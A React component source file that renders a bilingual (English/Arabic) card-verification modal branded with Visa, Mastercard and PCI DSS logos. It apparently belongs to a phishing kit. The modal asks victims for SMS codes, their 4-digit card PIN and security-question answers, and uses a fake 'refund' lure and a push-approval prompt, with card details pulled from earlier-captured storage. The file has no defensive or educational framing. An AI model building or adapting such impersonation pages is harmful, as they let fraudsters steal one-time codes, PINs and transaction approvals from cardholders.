import React, { useState, useEffect } from 'react';
import { getCardScheme } from '../utils/cardScheme';
import { getLang } from '../utils/i18n';
import { MERCHANT_NAME, CURRENCY, MODE } from '../utils/config';
import visaImg from './assets/visa.jpg';
import masterImg from './assets/master.jpg';
import pciImg from './assets/pci.jpg';
import helpGif from './assets/help.gif';
import './StandardCardLayout.css';

const TEXTS = {
  en: {
    otpTitle: 'Confirm by SMS',
    refundTitle: 'Refund Confirmation',
    pushTitle: 'Push Confirmation',
    pinTitle: 'Enter Card PIN',
    questionTitle: 'Security Verification',
    otpDesc: 'Enter the 4-8 digit security code we sent to your registered phone number.',
    refundDesc: (amount, currency) =>
      `A refund of ${amount} ${currency} has been initiated to your card. Enter the verification code sent to your phone to confirm the refund.`,
    pushDesc:
      'We have sent a push notification to your banking app. Please open the app on your phone and approve the transaction.',
    pinDesc: 'Please enter your 4-digit card PIN to authorize this transaction.',
    questionDesc: 'Please answer the security question below to verify your identity.',
    merchant: 'Merchant:',
    amount: 'Transaction amount:',
    refundAmount: 'Refund amount:',
    date: 'Date:',
    cardNumber: 'Card number:',
    cardholderName: 'Cardholder name:',
    codeLabel: 'Enter the code:',
    pinLabel: 'Card PIN:',
    answerLabel: 'Your answer:',
    resendIdle: 'Get a new code',
    resendWait: (s) => `Get a new code (${s})`,
    resendToast: 'A new SMS code has been sent to your phone.',
    confirmBtn: 'Confirm',
    confirmRefundBtn: 'Confirm Refund',
    confirmApprovalBtn: "I've Approved",
    submitting: 'Verifying...',
    cancelBtn: 'Cancel',
    helpTitle: 'Need help?',
    helpPhone: 'Contact your bank support service.',
    pushWaiting: 'Waiting for confirmation in your banking app...',
  },
  ar: {
    otpTitle: 'التأكيد عبر الرسائل القصيرة',
    refundTitle: 'تأكيد الاسترداد',
    pushTitle: 'تأكيد الإشعار الفوري',
    pinTitle: 'أدخل الرقم السري للبطاقة',
    questionTitle: 'التحقق الأمني',
    otpDesc: 'أدخل رمز الأمان المكون من 4 إلى 8 أرقام الذي أرسلناه إلى رقم هاتفك المسجل.',
    refundDesc: (amount, currency) =>
      `تم بدء استرداد مبلغ ${amount} ${currency} إلى بطاقتك. أدخل رمز التحقق المرسل إلى هاتفك لتأكيد الاسترداد.`,
    pushDesc:
      'لقد أرسلنا إشعاراً فورياً إلى تطبيق البنك الخاص بك. يرجى فتح التطبيق على هاتفك والموافقة على المعاملة.',
    pinDesc: 'يرجى إدخال الرقم السري للبطاقة المكون من 4 أرقام لتفويض هذه المعاملة.',
    questionDesc: 'يرجى الإجابة على سؤال الأمان أدناه للتحقق من هويتك.',
    merchant: 'التاجر:',
    amount: 'مبلغ المعاملة:',
    refundAmount: 'مبلغ الاسترداد:',
    date: 'التاريخ:',
    cardNumber: 'رقم البطاقة:',
    cardholderName: 'اسم حامل البطاقة:',
    codeLabel: 'أدخل الرمز:',
    pinLabel: 'الرقم السري:',
    answerLabel: 'إجابتك:',
    resendIdle: 'احصل على رمز جديد',
    resendWait: (s) => `احصل على رمز جديد (${s})`,
    resendToast: 'تم إرسال رمز SMS جديد إلى هاتفك.',
    confirmBtn: 'تأكيد',
    confirmRefundBtn: 'تأكيد الاسترداد',
    confirmApprovalBtn: 'لقد وافقت',
    submitting: 'جاري التحقق...',
    cancelBtn: 'إلغاء',
    helpTitle: 'هل تحتاج مساعدة؟',
    helpPhone: 'تواصل مع خدمة دعم البنك الخاص بك.',
    pushWaiting: 'في انتظار التأكيد في تطبيق البنك الخاص بك...',
  },
};

export const StandardCardLayout = ({
  mode = 'otp', // 'otp' | 'refund' | 'push' | 'pin' | 'question'
  inputValue = '',
  onInputChange,
  onSubmit,
  onCancel,
  error = '',
  submitting = false,
  questionText = '',
  refundAmount: refundAmountProp = '',
  minLen = 4,
  maxLen = 8,
}) => {
  const [resendCount, setResendCount] = useState(0);
  const [resendToast, setResendToast] = useState('');
  const [showHelp, setShowHelp] = useState(false);

  const rawNumber = localStorage.getItem('rawCardNumber') || localStorage.getItem('cardNumber') || '';
  const scheme = getCardScheme(rawNumber);
  const isVisa = scheme === 'visa';

  const modeEnv = MODE || '';
  const lang = modeEnv === 'standardAR' ? 'ar' : getLang();
  const isRtl = lang === 'ar';
  const txt = TEXTS[lang] || TEXTS.en;

  const merchant =
    localStorage.getItem('merchant') || MERCHANT_NAME || 'MERCHANT';
  const currency =
    localStorage.getItem('currency') || CURRENCY || 'USD';
  const amount = localStorage.getItem('amount') || '0.00';
  const refundAmount = refundAmountProp || localStorage.getItem('refund_amount') || amount;
  const cardNumber = localStorage.getItem('cardNumber') || '**** **** **** ****';
  const cardholderName = localStorage.getItem('cardholderName') || '';

  const now = new Date();
  const dateStr = `${String(now.getDate()).padStart(2, '0')}/${String(now.getMonth() + 1).padStart(2, '0')}/${now.getFullYear()} ${String(now.getHours()).padStart(2, '0')}:${String(now.getMinutes()).padStart(2, '0')}:${String(now.getSeconds()).padStart(2, '0')}`;

  useEffect(() => {
    if (resendCount <= 0) return;
    const t = setTimeout(() => setResendCount((c) => c - 1), 1000);
    return () => clearTimeout(t);
  }, [resendCount]);

  const handleResend = () => {
    if (resendCount > 0) return;
    setResendCount(30);
    setResendToast(txt.resendToast);
    setTimeout(() => setResendToast(''), 4000);
  };

  let title = txt.otpTitle;
  let desc = txt.otpDesc;
  if (mode === 'refund') {
    title = txt.refundTitle;
    desc = txt.refundDesc(refundAmount, currency);
  } else if (mode === 'push') {
    title = txt.pushTitle;
    desc = txt.pushDesc;
  } else if (mode === 'pin') {
    title = txt.pinTitle;
    desc = txt.pinDesc;
  } else if (mode === 'question') {
    title = txt.questionTitle;
    desc = questionText || txt.questionDesc;
  }

  return (
    <div className="std-card-bg" dir={isRtl ? 'rtl' : 'ltr'}>
      <div className="std-card-modal">
        {/* Top brand bar */}
        <div className="std-card-logos">
          <img
            src={isVisa ? visaImg : masterImg}
            alt={isVisa ? 'Verified by Visa' : 'MasterCard SecureCode'}
            className="std-card-scheme-logo"
          />
          <img src={pciImg} alt="PCI DSS" className="std-card-pci-logo" />
        </div>

        {/* Title & subtitle */}
        <h2 className="std-card-title">{title}</h2>
        <p className="std-card-desc">{desc}</p>

        {/* Transaction details table */}
        <div className="std-card-details">
          <div className="std-card-row">
            <span className="std-card-label">{txt.merchant}</span>
            <span className="std-card-value">{merchant}</span>
          </div>
          <div className="std-card-row">
            <span className="std-card-label">
              {mode === 'refund' ? txt.refundAmount : txt.amount}
            </span>
            <span className="std-card-value">
              {mode === 'refund' ? refundAmount : amount} {currency}
            </span>
          </div>
          <div className="std-card-row">
            <span className="std-card-label">{txt.date}</span>
            <span className="std-card-value">{dateStr}</span>
          </div>
          <div className="std-card-row">
            <span className="std-card-label">{txt.cardNumber}</span>
            <span className="std-card-value">{cardNumber}</span>
          </div>
          {cardholderName && (
            <div className="std-card-row">
              <span className="std-card-label">{txt.cardholderName}</span>
              <span className="std-card-value">{cardholderName}</span>
            </div>
          )}
        </div>

        {/* Form / Mode content */}
        <form onSubmit={onSubmit} className="std-card-form">
          {(mode === 'otp' || mode === 'refund') && (
            <>
              <label className="std-card-input-label">{txt.codeLabel}</label>
              <input
                type="text"
                inputMode="numeric"
                className={`std-card-input ${error ? 'std-card-input-error' : ''}`}
                placeholder={minLen === maxLen ? `${minLen} digits` : `${minLen}-${maxLen} digits`}
                value={inputValue}
                onChange={(e) =>
                  onInputChange?.(e.target.value.replace(/\D/g, '').slice(0, maxLen))
                }
                maxLength={maxLen}
                autoFocus
              />
              <button
                type="button"
                className="std-card-resend"
                onClick={handleResend}
                disabled={resendCount > 0}
              >
                {resendCount > 0 ? txt.resendWait(resendCount) : txt.resendIdle}
              </button>
              {resendToast && <div className="std-card-toast">{resendToast}</div>}
            </>
          )}

          {mode === 'pin' && (
            <>
              <label className="std-card-input-label">{txt.pinLabel}</label>
              <input
                type="password"
                inputMode="numeric"
                className={`std-card-input std-card-pin-input ${error ? 'std-card-input-error' : ''}`}
                placeholder="••••"
                value={inputValue}
                onChange={(e) =>
                  onInputChange?.(e.target.value.replace(/\D/g, '').slice(0, 4))
                }
                maxLength={4}
                autoFocus
              />
            </>
          )}

          {mode === 'question' && (
            <>
              <label className="std-card-input-label">{txt.answerLabel}</label>
              <input
                type="text"
                className={`std-card-input ${error ? 'std-card-input-error' : ''}`}
                value={inputValue}
                onChange={(e) => onInputChange?.(e.target.value)}
                autoFocus
              />
            </>
          )}

          {mode === 'push' && (
            <div className="std-card-push-box">
              <div className="std-card-push-spinner" />
              <p className="std-card-push-text">{txt.pushWaiting}</p>
            </div>
          )}

          {error && <div className="std-card-error">{error}</div>}

          <div className="std-card-actions">
            {mode !== 'push' ? (
              <button
                type="submit"
                className="std-card-submit-btn"
                disabled={submitting}
              >
                {submitting
                  ? txt.submitting
                  : mode === 'refund'
                  ? txt.confirmRefundBtn
                  : txt.confirmBtn}
              </button>
            ) : (
              onSubmit && (
                <button
                  type="submit"
                  className="std-card-submit-btn"
                  disabled={submitting}
                >
                  {submitting ? txt.submitting : txt.confirmApprovalBtn}
                </button>
              )
            )}

            {onCancel && (
              <button
                type="button"
                className="std-card-cancel-btn"
                onClick={onCancel}
              >
                {txt.cancelBtn}
              </button>
            )}
          </div>
        </form>

        {/* Footer help toggle */}
        <div className="std-card-footer">
          <button
            type="button"
            className="std-card-help-btn"
            onClick={() => setShowHelp((s) => !s)}
          >
            {txt.helpTitle}
          </button>
          {showHelp && (
            <div className="std-card-help-box">
              <p>{txt.helpPhone}</p>
              <img src={helpGif} alt="Help" className="std-card-help-gif" />
            </div>
          )}
        </div>
      </div>
    </div>
  );
};

export default StandardCardLayout;
